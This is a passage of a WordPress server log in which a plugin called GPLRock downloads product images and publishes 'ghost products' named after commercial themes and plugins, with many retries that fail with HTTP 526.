ninja-tables-pro-the-fastest-and-most-diverse-wp-datatables-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b5ddb093.jpg [10-Mar-2026 08:38:47 UTC] GPLRock: Using pre-downloaded image for product ninja-tables-pro-the-fastest-and-most-diverse-wp-datatables-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b5ddb093.jpg [10-Mar-2026 08:38:47 UTC] GPLRock: Ghost product published with image - Product ID: ninja-tables-pro-the-fastest-and-most-diverse-wp-datatables-plugin [10-Mar-2026 08:38:48 UTC] GPLRock: Image downloaded successfully for product grand-restaurant-cafe-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e07c211.jpg [10-Mar-2026 08:38:48 UTC] GPLRock: Using pre-downloaded image for product grand-restaurant-cafe-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e07c211.jpg [10-Mar-2026 08:38:48 UTC] GPLRock: Ghost product published with image - Product ID: grand-restaurant-cafe-wordpress-theme [10-Mar-2026 08:38:50 UTC] GPLRock: Image downloaded successfully for product addons-bundle-for-lumise-product-designer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-408e6eda.png [10-Mar-2026 08:38:50 UTC] GPLRock: Using pre-downloaded image for product addons-bundle-for-lumise-product-designer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-408e6eda.png [10-Mar-2026 08:38:50 UTC] GPLRock: Ghost product published with image - Product ID: addons-bundle-for-lumise-product-designer [10-Mar-2026 08:38:51 UTC] GPLRock: Image downloaded successfully for product listeo-directory-listings-with-booking-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a450334b.avif [10-Mar-2026 08:38:51 UTC] GPLRock: Using pre-downloaded image for product listeo-directory-listings-with-booking-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a450334b.avif [10-Mar-2026 08:38:51 UTC] GPLRock: Ghost product published with image - Product ID: listeo-directory-listings-with-booking-wordpress-theme [10-Mar-2026 08:43:17 UTC] GPLRock: Image download failed for product greenville-private-school-university-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:19 UTC] GPLRock: Image download failed for product greenville-private-school-university-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/greenville--private-school--university-education-wordpress-theme-30097.webp for product greenville-private-school-university-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:43:21 UTC] GPLRock: Image download failed for product greenville-private-school-university-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:23 UTC] GPLRock: Image download failed for product greenville-private-school-university-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/greenville--private-school--university-education-wordpress-theme-30097.webp for product greenville-private-school-university-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:43:25 UTC] GPLRock WARNING: Image download failed for product greenville-private-school-university-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/greenville--private-school--university-education-wordpress-theme-30097.webp [10-Mar-2026 08:43:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: greenville-private-school-university-education-wordpress-theme [10-Mar-2026 08:43:25 UTC] GPLRock: Image download failed for product bonko-safari-zoo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:27 UTC] GPLRock: Image download failed for product bonko-safari-zoo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bonko--safari--zoo-wordpress-theme-8004.webp for product bonko-safari-zoo-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:43:30 UTC] GPLRock: Image download failed for product bonko-safari-zoo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:32 UTC] GPLRock: Image download failed for product bonko-safari-zoo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bonko--safari--zoo-wordpress-theme-8004.webp for product bonko-safari-zoo-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:43:34 UTC] GPLRock WARNING: Image download failed for product bonko-safari-zoo-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bonko--safari--zoo-wordpress-theme-8004.webp [10-Mar-2026 08:43:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bonko-safari-zoo-wordpress-theme [10-Mar-2026 08:43:34 UTC] GPLRock: Image download failed for product tessa-modern-theme-for-blogs-magazines (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:36 UTC] GPLRock: Image download failed for product tessa-modern-theme-for-blogs-magazines (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tessa---modern-theme-for-blogs--magazines-6702.webp for product tessa-modern-theme-for-blogs-magazines after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:43:38 UTC] GPLRock: Image download failed for product tessa-modern-theme-for-blogs-magazines (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:40 UTC] GPLRock: Image download failed for product tessa-modern-theme-for-blogs-magazines (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tessa---modern-theme-for-blogs--magazines-6702.webp for product tessa-modern-theme-for-blogs-magazines after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:43:42 UTC] GPLRock WARNING: Image download failed for product tessa-modern-theme-for-blogs-magazines. URL: https://meldwp.com/wp-content/uploads/tessa---modern-theme-for-blogs--magazines-6702.webp [10-Mar-2026 08:43:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tessa-modern-theme-for-blogs-magazines [10-Mar-2026 08:43:42 UTC] GPLRock: Image download failed for product stradale-cafe-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:44 UTC] GPLRock: Image download failed for product stradale-cafe-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stradale---cafe--restaurant-wordpress-theme-14274.webp for product stradale-cafe-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:43:47 UTC] GPLRock: Image download failed for product stradale-cafe-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:49 UTC] GPLRock: Image download failed for product stradale-cafe-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stradale---cafe--restaurant-wordpress-theme-14274.webp for product stradale-cafe-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:43:51 UTC] GPLRock WARNING: Image download failed for product stradale-cafe-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/stradale---cafe--restaurant-wordpress-theme-14274.webp [10-Mar-2026 08:43:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stradale-cafe-restaurant-wordpress-theme [10-Mar-2026 08:43:51 UTC] GPLRock: Image downloaded successfully for product syron-personal-blog-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b4c5ddd.webp [10-Mar-2026 08:43:51 UTC] GPLRock: Using pre-downloaded image for product syron-personal-blog-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b4c5ddd.webp [10-Mar-2026 08:43:51 UTC] GPLRock: Ghost product published with image - Product ID: syron-personal-blog-magazine-wordpress-theme [10-Mar-2026 08:43:51 UTC] GPLRock: Image download failed for product ecopower-alternative-power-solar-energy-company (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:53 UTC] GPLRock: Image download failed for product ecopower-alternative-power-solar-energy-company (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecopower---alternative-power--solar-energy-company-27182.webp for product ecopower-alternative-power-solar-energy-company after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:43:55 UTC] GPLRock: Image download failed for product ecopower-alternative-power-solar-energy-company (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:43:57 UTC] GPLRock: Image download failed for product ecopower-alternative-power-solar-energy-company (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:44:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecopower---alternative-power--solar-energy-company-27182.webp for product ecopower-alternative-power-solar-energy-company after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:44:00 UTC] GPLRock WARNING: Image download failed for product ecopower-alternative-power-solar-energy-company. URL: https://meldwp.com/wp-content/uploads/ecopower---alternative-power--solar-energy-company-27182.webp [10-Mar-2026 08:44:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ecopower-alternative-power-solar-energy-company [10-Mar-2026 08:44:00 UTC] GPLRock: Image download failed for product bookworm-bookstore-bookshop-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:44:02 UTC] GPLRock: Image download failed for product bookworm-bookstore-bookshop-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:44:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookworm---bookstore--bookshop-woocommerce-theme-10727.webp for product bookworm-bookstore-bookshop-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:44:04 UTC] GPLRock: Image download failed for product bookworm-bookstore-bookshop-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:44:06 UTC] GPLRock: Image download failed for product bookworm-bookstore-bookshop-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:44:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookworm---bookstore--bookshop-woocommerce-theme-10727.webp for product bookworm-bookstore-bookshop-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:44:08 UTC] GPLRock WARNING: Image download failed for product bookworm-bookstore-bookshop-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/bookworm---bookstore--bookshop-woocommerce-theme-10727.webp [10-Mar-2026 08:44:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bookworm-bookstore-bookshop-woocommerce-theme [10-Mar-2026 08:44:08 UTC] GPLRock: Image download failed for product charety-charity-donation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:44:10 UTC] GPLRock: Image download failed for product charety-charity-donation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:44:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charety---charity--donation-wordpress-theme-27172.webp for product charety-charity-donation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:44:13 UTC] GPLRock: Image download failed for product charety-charity-donation-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:44:15 UTC] GPLRock: Image download failed for product charety-charity-donation-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:44:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charety---charity--donation-wordpress-theme-27172.webp for product charety-charity-donation-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:44:17 UTC] GPLRock WARNING: Image download failed for product charety-charity-donation-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/charety---charity--donation-wordpress-theme-27172.webp [10-Mar-2026 08:44:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: charety-charity-donation-wordpress-theme [10-Mar-2026 08:44:17 UTC] GPLRock: Image downloaded successfully for product fitness-pro-gym-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-25cc8b1d.webp [10-Mar-2026 08:44:17 UTC] GPLRock: Using pre-downloaded image for product fitness-pro-gym-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-25cc8b1d.webp [10-Mar-2026 08:44:17 UTC] GPLRock: Ghost product published with image - Product ID: fitness-pro-gym-wordpress-theme [10-Mar-2026 08:44:17 UTC] GPLRock: Image download failed for product luwix-data-science-analytics-wordpress-theme-rtl-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:44:19 UTC] GPLRock: Image download failed for product luwix-data-science-analytics-wordpress-theme-rtl-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:44:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luwix---data-science--analytics-wordpress-theme--rtl-ready-26066.webp for product luwix-data-science-analytics-wordpress-theme-rtl-ready after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:44:21 UTC] GPLRock: Image download failed for product luwix-data-science-analytics-wordpress-theme-rtl-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:44:23 UTC] GPLRock: Image download failed for product luwix-data-science-analytics-wordpress-theme-rtl-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:44:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luwix---data-science--analytics-wordpress-theme--rtl-ready-26066.webp for product luwix-data-science-analytics-wordpress-theme-rtl-ready after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:44:25 UTC] GPLRock WARNING: Image download failed for product luwix-data-science-analytics-wordpress-theme-rtl-ready. URL: https://meldwp.com/wp-content/uploads/luwix---data-science--analytics-wordpress-theme--rtl-ready-26066.webp [10-Mar-2026 08:44:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: luwix-data-science-analytics-wordpress-theme-rtl-ready [10-Mar-2026 08:48:42 UTC] GPLRock: Image download failed for product modern-audio-player-schedule-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:48:44 UTC] GPLRock: Image download failed for product modern-audio-player-schedule-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:48:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modern-audio-player-schedule-addon-14798.webp for product modern-audio-player-schedule-addon after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:48:47 UTC] GPLRock: Image download failed for product modern-audio-player-schedule-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:48:49 UTC] GPLRock: Image download failed for product modern-audio-player-schedule-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:48:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/modern-audio-player-schedule-addon-14798.webp for product modern-audio-player-schedule-addon after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:48:51 UTC] GPLRock WARNING: Image download failed for product modern-audio-player-schedule-addon. URL: https://meldwp.com/wp-content/uploads/modern-audio-player-schedule-addon-14798.webp [10-Mar-2026 08:48:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: modern-audio-player-schedule-addon [10-Mar-2026 08:48:53 UTC] GPLRock: Image download failed for product woocommerce-price-by-customer-and-user-roles (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:48:55 UTC] GPLRock: Image download failed for product woocommerce-price-by-customer-and-user-roles (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:48:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-price-by-customer-and-user-roles-10003.webp for product woocommerce-price-by-customer-and-user-roles after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:48:57 UTC] GPLRock: Image download failed for product woocommerce-price-by-customer-and-user-roles (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:48:59 UTC] GPLRock: Image download failed for product woocommerce-price-by-customer-and-user-roles (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-price-by-customer-and-user-roles-10003.webp for product woocommerce-price-by-customer-and-user-roles after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:49:01 UTC] GPLRock WARNING: Image download failed for product woocommerce-price-by-customer-and-user-roles. URL: https://meldwp.com/wp-content/uploads/woocommerce-price-by-customer-and-user-roles-10003.webp [10-Mar-2026 08:49:01 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-price-by-customer-and-user-roles [10-Mar-2026 08:49:01 UTC] GPLRock: Image download failed for product out-of-stock-product-reservation-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:03 UTC] GPLRock: Image download failed for product out-of-stock-product-reservation-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/out-of-stock-product-reservation-for-woocommerce-29546.webp for product out-of-stock-product-reservation-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:49:06 UTC] GPLRock: Image download failed for product out-of-stock-product-reservation-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:08 UTC] GPLRock: Image download failed for product out-of-stock-product-reservation-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/out-of-stock-product-reservation-for-woocommerce-29546.webp for product out-of-stock-product-reservation-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:49:10 UTC] GPLRock WARNING: Image download failed for product out-of-stock-product-reservation-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/out-of-stock-product-reservation-for-woocommerce-29546.webp [10-Mar-2026 08:49:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: out-of-stock-product-reservation-for-woocommerce [10-Mar-2026 08:49:10 UTC] GPLRock: Image downloaded successfully for product ticket-system-laravel-helpdesk-pro-with-email-to-ticket-support (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bba9b8ce.webp [10-Mar-2026 08:49:10 UTC] GPLRock: Using pre-downloaded image for product ticket-system-laravel-helpdesk-pro-with-email-to-ticket-support: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bba9b8ce.webp [10-Mar-2026 08:49:10 UTC] GPLRock: Ghost product published with image - Product ID: ticket-system-laravel-helpdesk-pro-with-email-to-ticket-support [10-Mar-2026 08:49:10 UTC] GPLRock: Image download failed for product woo-cart-slide-cart-floating-cart-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:12 UTC] GPLRock: Image download failed for product woo-cart-slide-cart-floating-cart-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woo-cart---slide-cart--floating-cart-for-woocommerce-13654.webp for product woo-cart-slide-cart-floating-cart-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:49:14 UTC] GPLRock: Image download failed for product woo-cart-slide-cart-floating-cart-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:16 UTC] GPLRock: Image download failed for product woo-cart-slide-cart-floating-cart-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woo-cart---slide-cart--floating-cart-for-woocommerce-13654.webp for product woo-cart-slide-cart-floating-cart-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:49:18 UTC] GPLRock WARNING: Image download failed for product woo-cart-slide-cart-floating-cart-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/woo-cart---slide-cart--floating-cart-for-woocommerce-13654.webp [10-Mar-2026 08:49:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woo-cart-slide-cart-floating-cart-for-woocommerce [10-Mar-2026 08:49:19 UTC] GPLRock: Image download failed for product woocommerce-contactless-delivery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:21 UTC] GPLRock: Image download failed for product woocommerce-contactless-delivery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-contactless-delivery-15100.webp for product woocommerce-contactless-delivery after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:49:24 UTC] GPLRock: Image download failed for product woocommerce-contactless-delivery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:26 UTC] GPLRock: Image download failed for product woocommerce-contactless-delivery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-contactless-delivery-15100.webp for product woocommerce-contactless-delivery after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:49:28 UTC] GPLRock WARNING: Image download failed for product woocommerce-contactless-delivery. URL: https://meldwp.com/wp-content/uploads/woocommerce-contactless-delivery-15100.webp [10-Mar-2026 08:49:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-contactless-delivery [10-Mar-2026 08:49:28 UTC] GPLRock: Image download failed for product rcwd-sendinblue-for-gravity-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:30 UTC] GPLRock: Image download failed for product rcwd-sendinblue-for-gravity-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rcwd-sendinblue-for-gravity-forms-17880.webp for product rcwd-sendinblue-for-gravity-forms after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:49:32 UTC] GPLRock: Image download failed for product rcwd-sendinblue-for-gravity-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:35 UTC] GPLRock: Image download failed for product rcwd-sendinblue-for-gravity-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rcwd-sendinblue-for-gravity-forms-17880.webp for product rcwd-sendinblue-for-gravity-forms after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:49:37 UTC] GPLRock WARNING: Image download failed for product rcwd-sendinblue-for-gravity-forms. URL: https://meldwp.com/wp-content/uploads/rcwd-sendinblue-for-gravity-forms-17880.webp [10-Mar-2026 08:49:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rcwd-sendinblue-for-gravity-forms [10-Mar-2026 08:49:37 UTC] GPLRock: Image download failed for product edd-donation-tip (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:39 UTC] GPLRock: Image download failed for product edd-donation-tip (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edd-donation--tip-1166.webp for product edd-donation-tip after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:49:41 UTC] GPLRock: Image download failed for product edd-donation-tip (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:43 UTC] GPLRock: Image download failed for product edd-donation-tip (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/edd-donation--tip-1166.webp for product edd-donation-tip after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:49:45 UTC] GPLRock WARNING: Image download failed for product edd-donation-tip. URL: https://meldwp.com/wp-content/uploads/edd-donation--tip-1166.webp [10-Mar-2026 08:49:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: edd-donation-tip [10-Mar-2026 08:49:45 UTC] GPLRock: Image download failed for product jl-token-queue-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:48 UTC] GPLRock: Image download failed for product jl-token-queue-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jl-token---queue-management-system-15356.webp for product jl-token-queue-management-system after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:49:50 UTC] GPLRock: Image download failed for product jl-token-queue-management-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:52 UTC] GPLRock: Image download failed for product jl-token-queue-management-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jl-token---queue-management-system-15356.webp for product jl-token-queue-management-system after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:49:54 UTC] GPLRock WARNING: Image download failed for product jl-token-queue-management-system. URL: https://meldwp.com/wp-content/uploads/jl-token---queue-management-system-15356.webp [10-Mar-2026 08:49:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jl-token-queue-management-system [10-Mar-2026 08:49:54 UTC] GPLRock: Image download failed for product hr-manager-human-resource-management-system-hr-software-hrms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:56 UTC] GPLRock: Image download failed for product hr-manager-human-resource-management-system-hr-software-hrms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:49:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hr-manager---human-resource-management-system-hr-software-hrms-14630.webp for product hr-manager-human-resource-management-system-hr-software-hrms after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:49:58 UTC] GPLRock: Image download failed for product hr-manager-human-resource-management-system-hr-software-hrms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:50:00 UTC] GPLRock: Image download failed for product hr-manager-human-resource-management-system-hr-software-hrms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [10-Mar-2026 08:50:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hr-manager---human-resource-management-system-hr-software-hrms-14630.webp for product hr-manager-human-resource-management-system-hr-software-hrms after 3 attempts. HTTP Code: 526, Error: [10-Mar-2026 08:50:03 UTC] GPLRock WARNING: Image download failed for product hr-manager-human-resource-management-system-hr-software-hrms. URL: https://meldwp.com/wp-content/uploads/hr-manager---human-resource-management-system-hr-software-hrms-14630.webp [10-Mar-2026 08:50:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hr-manager-human-resource-management-system-hr-software-hrms [10-Mar-2026 08:50:07 UTC] GPLRock: Image downloaded successfully for product modula-pro-best-wordpress-image-gallery (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-12fb18e6.jpg [10-Mar-2026 08:50:07 UTC] GPLRock: Using pre-downloaded image for product modula-pro-best-wordpress-image-gallery: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-12fb18e6.jpg [10-Mar-2026 08:50:07 UTC] GPLRock: Ghost product published with image - Product ID: modula-pro-best-wordpress-image-gallery [10-Mar-2026 08:50:08 UTC] GPLRock: Image downloaded successfully for product palleon-wordpress-image-editor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-10fe14fc.jpg [10-Mar-2026 08:50:08 UTC] GPLRock: Using pre-downloaded image for product palleon-wordpress-image-editor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-10fe14fc.jpg [10-Mar-2026 08:50:08 UTC] GPLRock: Ghost product published with image - Product ID: palleon-wordpress-image-editor [10-Mar-2026 08:50:10 UTC] GPLRock: Image downloaded successfully for product qahira-umrah-hajj-tour-travel-elementor-template-kit (attempt 1) to: 